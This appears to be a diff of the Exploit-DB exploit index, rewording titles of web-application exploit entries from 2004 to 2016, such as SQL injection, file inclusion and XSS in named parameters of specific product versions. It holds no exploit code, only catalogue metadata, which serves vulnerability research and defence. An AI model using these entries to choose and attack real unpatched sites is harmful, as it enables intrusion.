7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0
7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax (comment_id) - SQL Injection",2009-01-11,FasTWORM,php,webapps,0
7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
@ -20417,7 +20422,7 @@ id,file,description,date,author,platform,type,port
7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
7866,platforms/php/webapps/7866.txt,"Simple Machines Forum 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0
7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0
7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0
7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
@ -20474,7 +20479,7 @@ id,file,description,date,author,platform,type,port
7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0
7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0
7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing",2009-02-03,Xianur0,php,webapps,0
7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0
7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0
7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0
@ -20615,9 +20620,9 @@ id,file,description,date,author,platform,type,port
8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0
8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0
8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' Parameter SQL Injection",2009-03-09,elusiven,php,webapps,0
8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0
8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0
8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' Parameter SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0
8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0
8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0
8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0
@ -20794,7 +20799,7 @@ id,file,description,date,author,platform,type,port
8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0
8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",php,webapps,0
8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],php,webapps,0
8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - (route) Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0
8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - 'route' Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0
8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0
8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0
8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php ln' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
@ -20909,7 +20914,7 @@ id,file,description,date,author,platform,type,port
8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0
8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0
8743,platforms/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections Exploits",2009-05-20,ByALBAYX,php,webapps,0
8744,platforms/php/webapps/8744.txt,"exjune officer message system 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
8744,platforms/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
8745,platforms/php/webapps/8745.txt,"catviz 0.4.0b1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0
8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0
@ -21651,7 +21656,7 @@ id,file,description,date,author,platform,type,port
10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities",2009-12-01,cr4wl3r,linux,webapps,80
10272,platforms/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0
10273,platforms/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0
10274,platforms/php/webapps/10274.txt,"Simple Machines Forum - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0
10274,platforms/php/webapps/10274.txt,"Simple Machines Forum (SMF) - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0
10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR",2009-12-02,andresg888,php,webapps,0
10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0
10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion",2009-12-03,cr4wl3r,php,webapps,0
@ -22483,7 +22488,7 @@ id,file,description,date,author,platform,type,port
11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0
11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0
11725,platforms/php/webapps/11725.txt,"Joomla! Component com_org - SQL Injection",2010-03-14,N2n-Hacker,php,webapps,0
11726,platforms/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0
11726,platforms/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - 'downloads.php' SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0
11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,php,webapps,0
11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,cr4wl3r,php,webapps,0
40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80
@ -22600,7 +22605,7 @@ id,file,description,date,author,platform,type,port
11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
11904,platforms/php/webapps/11904.txt,"68KB - Multiple Remote File Inclusions",2010-03-27,ITSecTeam,php,webapps,0
11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) 1.1.8 - (avatar) Remote PHP File Execute (PoC)",2010-03-27,JosS,php,webapps,0
11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC)",2010-03-27,JosS,php,webapps,0
11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities",2010-03-27,cp77fk4r,php,webapps,0
11908,platforms/php/webapps/11908.txt,"Joomla! Component com_solution - SQL Injection",2010-03-27,"DevilZ TM",php,webapps,0
11912,platforms/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection",2010-03-28,"Easy Laster",php,webapps,0
@ -22670,7 +22675,7 @@ id,file,description,date,author,platform,type,port
12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",php,webapps,0
12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0
12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection",2010-04-03,Inj3ct0r,php,webapps,0
12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf Mod Downloads - SQL Injection",2010-04-03,Inj3ct0r,php,webapps,0
12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery",2010-04-03,cp77fk4r,asp,webapps,0
12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,php,webapps,0
12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0
@ -23606,7 +23611,7 @@ id,file,description,date,author,platform,type,port
14378,platforms/php/webapps/14378.txt,"Pre Podcast Portal - Authentication Bypass",2010-07-16,D4rk357,php,webapps,0
14381,platforms/php/webapps/14381.txt,"Group Office - Remote Command Execution",2010-07-16,"ADEO Security",php,webapps,0
14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA - Cross-Site Request Forgery",2010-07-16,Markot,windows,webapps,0
14383,platforms/php/webapps/14383.txt,"Group Office - (comment_id) SQL Injection",2010-07-16,"Canberk BOLAT",php,webapps,0
14383,platforms/php/webapps/14383.txt,"Group Office - 'comment_id' SQL Injection",2010-07-16,"Canberk BOLAT",php,webapps,0
14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection",2010-07-20,v0calist,asp,webapps,0
14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection",2010-07-20,CoBRa_21,asp,webapps,0
14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0
@ -23921,7 +23926,7 @@ id,file,description,date,author,platform,type,port
15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0
39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG - User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0
15227,platforms/php/webapps/15227.txt,"PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection",2010-10-10,"Easy Laster",php,webapps,0
15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0
15594,platforms/php/webapps/15594.txt,"AuraCMS 1.62 - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0
@ -24720,7 +24725,7 @@ id,file,description,date,author,platform,type,port
17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,jsp,webapps,0
17616,platforms/php/webapps/17616.txt,"WordPress Plugin ProPlayer 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0
17617,platforms/php/webapps/17617.txt,"WordPress Plugin Social Slider 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0
17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 - session Hijacking",2011-08-07,seth,php,webapps,0
17637,platforms/php/webapps/17637.txt,"Simple Machines Forum (SMF) 2.0 - Session Hijacking",2011-08-07,seth,php,webapps,0
17627,platforms/php/webapps/17627.txt,"WordPress Plugin UPM Polls 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0
17628,platforms/php/webapps/17628.txt,"WordPress Plugin Media Library Categories 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0
17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
@ -26462,7 +26467,7 @@ id,file,description,date,author,platform,type,port
23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0
@ -26661,7 +26666,7 @@ id,file,description,date,author,platform,type,port
24074,platforms/php/webapps/24074.txt,"Coppermine Photo Gallery 1.x - init.inc.php Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x - theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - AddUser.cfm Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0
24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0
24082,platforms/php/webapps/24082.txt,"Simple Machines Forum (SMF) 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0
24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0
24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0
24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0
@ -27061,7 +27066,7 @@ id,file,description,date,author,platform,type,port
24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - (FileManager.php) Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0
24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - 'FileManager.php' Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0
24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQL Injections",2013-03-25,"Saadi Siddiqui",php,webapps,0
24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid Parameter) Blind SQL Injection",2013-03-25,Esac,php,webapps,0
24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0
@ -27101,7 +27106,7 @@ id,file,description,date,author,platform,type,port
25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0
24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0
24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - Viewthread.php Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0
25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0
24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0
24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0
24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/post.ph'p content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0
@ -27240,7 +27245,7 @@ id,file,description,date,author,platform,type,port
25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 - Database Configuration Information Disclosure",2005-03-18,"Majid NT",php,webapps,0
25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - avatar.php img Parameter Cross-Site Scripting",2005-03-19,Romano,php,webapps,0
25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 - Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 - 'Setuser.php' HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
40397,platforms/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade and Sven Krewitt",aspx,webapps,0
25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
@ -27891,7 +27896,7 @@ id,file,description,date,author,platform,type,port
26097,platforms/php/webapps/26097.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jnl_records User Database Disclosure",2005-08-05,Lostmon,php,webapps,0
26098,platforms/php/webapps/26098.txt,"FlatNuke 2.5.5 - structure.php Multiple Parameter Cross-Site Scripting",2005-08-05,rgod,php,webapps,0
26099,platforms/php/webapps/26099.txt,"FlatNuke 2.5.5 - footer.php Multiple Parameter Cross-Site Scripting",2005-08-05,rgod,php,webapps,0
26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 - messages.php SQL Injection",2005-08-06,almaster,php,webapps,0
26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 - 'messages.php' SQL Injection",2005-08-06,almaster,php,webapps,0
26103,platforms/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps,0
26104,platforms/php/webapps/26104.html,"Invision Power Board 1.0.3 - Attached File Cross-Site Scripting",2005-08-08,V[i]RuS,php,webapps,0
26105,platforms/php/webapps/26105.html,"E107 Website System 0.6 - Attached File Cross-Site Scripting",2005-08-08,edward11,php,webapps,0
@ -28354,7 +28359,7 @@ id,file,description,date,author,platform,type,port
26702,platforms/asp/webapps/26702.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - bsearch.asp b_search Parameter Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0
26704,platforms/asp/webapps/26704.txt,"Solupress News 1.0 - search.asp Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0
26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 - Archive.asp Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0
26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - messages.php SQL Injection",2005-12-03,"Nolan West",php,webapps,0
26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - 'messages.php' SQL Injection",2005-12-03,"Nolan West",php,webapps,0
26707,platforms/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps,0
26713,platforms/php/webapps/26713.txt,"PHPYellowTM 5.33 - search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0
26714,platforms/php/webapps/26714.txt,"PHPYellowTM 5.33 - print_me.php ckey Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0
@ -28485,7 +28490,7 @@ id,file,description,date,author,platform,type,port
26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum - forum.php SQL Injection",2005-12-19,Zbigniew,php,webapps,0
26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - members.php Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 - faq.asp s Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0
@ -29651,7 +29656,7 @@ id,file,description,date,author,platform,type,port
28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0
28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0
28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - Viewfile Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0
28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x - news.php SQL Injection",2006-09-07,rgod,php,webapps,0
28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x - 'news.php' SQL Injection",2006-09-07,rgod,php,webapps,0
28497,platforms/php/webapps/28497.txt,"Vikingboard Viking board 0.1b - help.php act Parameter Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b - report.php p Parameter Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - topic.php SQL Injection",2006-09-08,Hessam-x,php,webapps,0
@ -29917,7 +29922,7 @@ id,file,description,date,author,platform,type,port
28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - DBProperty.php Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0
28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - index.asp SQL Injection",2006-10-18,fireboy,asp,webapps,0
28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0
28831,platforms/php/webapps/28831.txt,"Simple Machines Forum 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0
28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0
28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0
28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0
28838,platforms/php/webapps/28838.txt,"ClanLite - Config-PHP.php Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
@ -30678,7 +30683,7 @@ id,file,description,date,author,platform,type,port
29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0
29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0
29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0
29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 Mod Calendar_Panel - 'Show_Event.php' SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0
